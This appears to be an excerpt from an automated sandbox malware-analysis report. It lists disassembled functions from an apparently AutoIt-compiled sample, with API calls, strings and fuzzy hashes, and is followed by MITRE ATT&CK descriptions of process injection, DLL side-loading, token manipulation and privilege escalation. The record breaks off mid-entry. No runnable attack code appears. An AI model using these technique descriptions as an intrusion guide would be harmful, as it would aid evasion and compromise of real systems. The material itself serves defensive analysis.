Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: d773126f455003894d72d73f9b4963507c3d71289d21f6be2038d6e0bcb41167
Instruction ID: bd5e82f3704e99aa9e0b646e2842aa4d0c814844106b22c402f005e3074d444c
Opcode Fuzzy Hash: d773126f455003894d72d73f9b4963507c3d71289d21f6be2038d6e0bcb41167
Instruction Fuzzy Hash: BF312631A20309DFEF25DF48DC85BAEBBF8EF05350F140029E991A71A1D7709A44DB51

Function 00C439E9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00C43A66

Part of subcall function 00BD7DE1: _memmove.LIBCMT ref: 00BD7E22

Strings

AUTOITCALLVARIABLE%d, xrefs: 00C43A58
, $, xrefs: 00C43AA6

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 3506404897-2584243854
Opcode ID: 24476355b73677d959439728b1350328269fffc31e6bdb2ad66654f9a38c4a68
Instruction ID: 8b56f9e4fd683db2d047753c246f58daed896f43492722c2b66d93bd3e96da73
Opcode Fuzzy Hash: 24476355b73677d959439728b1350328269fffc31e6bdb2ad66654f9a38c4a68
Instruction Fuzzy Hash: 8A218F70640219AFCF10EFA4CC82AAEB7F5FF84700F5404A5E855AB281EB30EA45DB65

Function 00C566D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00C56761
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C5676C

Strings

Combobox, xrefs: 00C5672E

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 333c453e831b0c528d2c5bc4395e2ce042d4e419680ddfd9aa313a042c8ffcb5
Instruction ID: 3b921bb36c0c0f872a0eb9027aa8bb11cd872d94ff5a2f462acb4cb992877c9e
Opcode Fuzzy Hash: 333c453e831b0c528d2c5bc4395e2ce042d4e419680ddfd9aa313a042c8ffcb5
Instruction Fuzzy Hash: 8F11B6792002087FEF159F54CC80EBB376AEB483A9F500129FD2497290D6319D9587A4

Function 00C56C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00BD1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00BD1D73
Part of subcall function 00BD1D35: GetStockObject.GDI32(00000011), ref: 00BD1D87
Part of subcall function 00BD1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00BD1D91

GetWindowRect.USER32(00000000,?), ref: 00C56C71
GetSysColor.USER32(00000012), ref: 00C56C8B

Strings

static, xrefs: 00C56C4E

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 4b5dd927e9c3cdef18bfe45e2a1d2293c88f8385cf17f919ed7ae9226b508b19
Instruction ID: 45b1fb7101363d0d26059c4bbbf3465cd633ce74ed92bddff62ad9875f6e7589
Opcode Fuzzy Hash: 4b5dd927e9c3cdef18bfe45e2a1d2293c88f8385cf17f919ed7ae9226b508b19
Instruction Fuzzy Hash: 2B215676610209AFDF08DFA8CC45AEA7BA9FB08305F004629FD95E3250E735E895DB60

Function 00C56920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00C569A2
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00C569B1

Strings

edit, xrefs: 00C56986

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 9983f75bc9f50c17a838464bb6479d944573ddc96b374e6a7ccb6cd7f1374088
Instruction ID: 09c9af1832cc8d731bf56620f00b71744a9913c26baa4761c7b1cd8df0a2b264
Opcode Fuzzy Hash: 9983f75bc9f50c17a838464bb6479d944573ddc96b374e6a7ccb6cd7f1374088
Instruction Fuzzy Hash: 11116D79500208ABEB108E64DC44AEB37A9EB1537AF904728FDB5971E0C731DC99A764

Function 00C329AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C32A22
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00C32A41

Strings

0, xrefs: 00C32A18

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 9f2b20fc0024323fe25b406bf97b28647d541643110cdeff63ccb21212b54f63
Instruction ID: a0837ae2826033beec433448f7aa37f3debf86f5bb42042f9950f2ebf1adbc79
Opcode Fuzzy Hash: 9f2b20fc0024323fe25b406bf97b28647d541643110cdeff63ccb21212b54f63
Instruction Fuzzy Hash: 53110872921214ABCF31DF58DC44BEEB3B8AB45300F244021E8A5E72A0D730AE0AE791

Function 00C421D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00C4222C
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00C42255

Strings

<local>, xrefs: 00C4221D

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 117c4a2a326689dc8d6eb734b5d4aeb6183c92a584dd631a0a7294e8f75684e2
Instruction ID: 3c0b7b2499cb7b87efda3c48407d5aa48a2ede8995e71f043273b9c247d47260
Opcode Fuzzy Hash: 117c4a2a326689dc8d6eb734b5d4aeb6183c92a584dd631a0a7294e8f75684e2
Instruction Fuzzy Hash: 3311C670541225BADB398F52CC86FBBFBA8FF16761F50822AF51596000D2B05A95D6F0

Function 00C28E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BD7DE1: _memmove.LIBCMT ref: 00BD7E22

Part of subcall function 00C2AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C2AABC

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00C28E73

Strings

ComboBox, xrefs: 00C28E12
ListBox, xrefs: 00C28E3D

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 213f51923889970792c3e419734ea312ae070bf73426be99f77007909c9f52f3
Instruction ID: 5eef446c3202688811e3cb3969f6daf7f3eba1e36ca9941120fc58cea0248166
Opcode Fuzzy Hash: 213f51923889970792c3e419734ea312ae070bf73426be99f77007909c9f52f3
Instruction Fuzzy Hash: B201F5B5642229AB8B14EBA4CC519FE73A9AF01320B10066AB871673E1EE31580CD660

Function 00C38D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00C38DAC
__fread_nolock.LIBCMT ref: 00C38DC1

Strings

EA06, xrefs: 00C38DF3

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: fae7538e4ffd769c547261d1919a86130c1cc55c993ddd85c42862cbdc463371
Instruction ID: 07c6d73105f86d077e3333c0e824d933f440fdc7a5c07d729ec4905ec5de8b59
Opcode Fuzzy Hash: fae7538e4ffd769c547261d1919a86130c1cc55c993ddd85c42862cbdc463371
Instruction Fuzzy Hash: 8201F572C042187EDB28DAA8CC16EFEBBF8DB11301F00419AF652D2181E874E6088BA0

Function 00C28CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BD7DE1: _memmove.LIBCMT ref: 00BD7E22

Part of subcall function 00C2AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C2AABC

SendMessageW.USER32(?,00000180,00000000,?), ref: 00C28D6B

Strings

ComboBox, xrefs: 00C28D0A
ListBox, xrefs: 00C28D35

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 6d860ef00761cccb2bf9118ec78005a0bf5bc5176c6af04dbdf3e858ba4fd542
Instruction ID: 8ef15fd22473ca849b2b287ff5f108aba0b11e17d72e3f4c991f85882b2aa13c
Opcode Fuzzy Hash: 6d860ef00761cccb2bf9118ec78005a0bf5bc5176c6af04dbdf3e858ba4fd542
Instruction Fuzzy Hash: 3201D4B1A4111AABCF14EBA0DD52EFEB3A89F15300F10006AB801676D1EE245E0CD671

Function 00C28D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BD7DE1: _memmove.LIBCMT ref: 00BD7E22

Part of subcall function 00C2AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C2AABC

SendMessageW.USER32(?,00000182,?,00000000), ref: 00C28DEE

Strings

ComboBox, xrefs: 00C28D8F
ListBox, xrefs: 00C28DBA

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: c57fa8d9fc567e3c739090c55186007e900862a7122403845baff378bc5ffb77
Instruction ID: c0effe6234949924ca01fb4caafc5a5f5cb6b41417ddd1188a40062c170a75d7
Opcode Fuzzy Hash: c57fa8d9fc567e3c739090c55186007e900862a7122403845baff378bc5ffb77
Instruction Fuzzy Hash: 4101F2B1A4211AA7CB20EAA4D952EFEB3A89F11300F100026B801736D2EE258E0CE675

Function 00C34F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00C34F46
_wcscmp.LIBCMT ref: 00C34F58

Strings

#32770, xrefs: 00C34F52

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: e5eb2958cbf11dba478dcc320f2c862c91e0272eced9c752ea8bb2d99086f33b
Instruction ID: 46184a800bbbee63f55d061ec8d7215de1af0f64af3a686d69bcdc431d6795b6
Opcode Fuzzy Hash: e5eb2958cbf11dba478dcc320f2c862c91e0272eced9c752ea8bb2d99086f33b
Instruction Fuzzy Hash: CFE09B3250022826D7109695DC49BA7F7ECDB55B61F010067FD04D3051D5609B4587D0

Function 00C0B2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00C0B314: _memset.LIBCMT ref: 00C0B321

Part of subcall function 00BF0940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00C0B2F0,?,?,?,00BD100A), ref: 00BF0945

IsDebuggerPresent.KERNEL32(?,?,?,00BD100A), ref: 00C0B2F4
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00BD100A), ref: 00C0B303

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00C0B2FE

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: 253a3fb45e4fc39ea2360f6e0a6e11e19a42eeab188217e16789b0aa390e5cc7
Instruction ID: d8d17371c71ef2d548626fcf621b522f0211f04df3cb9976eeef809f64ddcc81
Opcode Fuzzy Hash: 253a3fb45e4fc39ea2360f6e0a6e11e19a42eeab188217e16789b0aa390e5cc7
Instruction Fuzzy Hash: 41E06DB4210B008BD724EF28D80834A7AE4AF00705F10C97DE49AC77A1EBB4D884CBA1

Function 00C11935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 00C11775

Part of subcall function 00C4BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,00C1195E,?), ref: 00C4BFFE
Part of subcall function 00C4BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00C4C010

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00C1196D

Strings

WIN_XPe, xrefs: 00C11788

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Library$AddressDirectoryFreeLoadProcSystem
String ID: WIN_XPe
API String ID: 582185067-3257408948
Opcode ID: fba7cada9b63b7c350845f5ebe54d1afaf77b1da6880e8f9d0dcb4effdeef3d3
Instruction ID: 71cab1a64bdeb94bf19282f03671de8b822a322339852c4ccc2cdb3efc6175e2
Opcode Fuzzy Hash: fba7cada9b63b7c350845f5ebe54d1afaf77b1da6880e8f9d0dcb4effdeef3d3
Instruction Fuzzy Hash: 9AF0A570800109DBDB15DBA1C988BEDBAF8AB09301F580096E612A22A0D7758F85EFA1

Function 00C55998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C559AE
PostMessageW.USER32(00000000), ref: 00C559B5

Part of subcall function 00C35244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C352BC

Strings

Shell_TrayWnd, xrefs: 00C559A7

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: e02ff35af20f9770bc3f3d795d3c080bc66c05b4af61fe1a7cb7b763664f20c7
Instruction ID: b65d87bba9662b82c2c2e4e7455aa7a5cd51367d99ff775c1b6afbefa42ac178
Opcode Fuzzy Hash: e02ff35af20f9770bc3f3d795d3c080bc66c05b4af61fe1a7cb7b763664f20c7
Instruction Fuzzy Hash: FDD0C9753C4311BBE668BB709C0BF9B6614AB04B51F400839B345AB1D0D9E0A841C658

Function 00C55964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C5596E
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00C55981

Part of subcall function 00C35244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C352BC

Strings

Shell_TrayWnd, xrefs: 00C55967

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: d65c4f505910a0b884332a01a0c68723db9f52512cf3815e32cde79d14f924a1
Instruction ID: 5c4317b5c3196e49b64bebdaa57ab6b1da1f2bed4c8b229f4677c87f508f42a9
Opcode Fuzzy Hash: d65c4f505910a0b884332a01a0c68723db9f52512cf3815e32cde79d14f924a1
Instruction Fuzzy Hash: 95D0C979394311B7E668BB709C0BF9B6A14AB00B51F000839B349AB1D0D9E09841C654

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
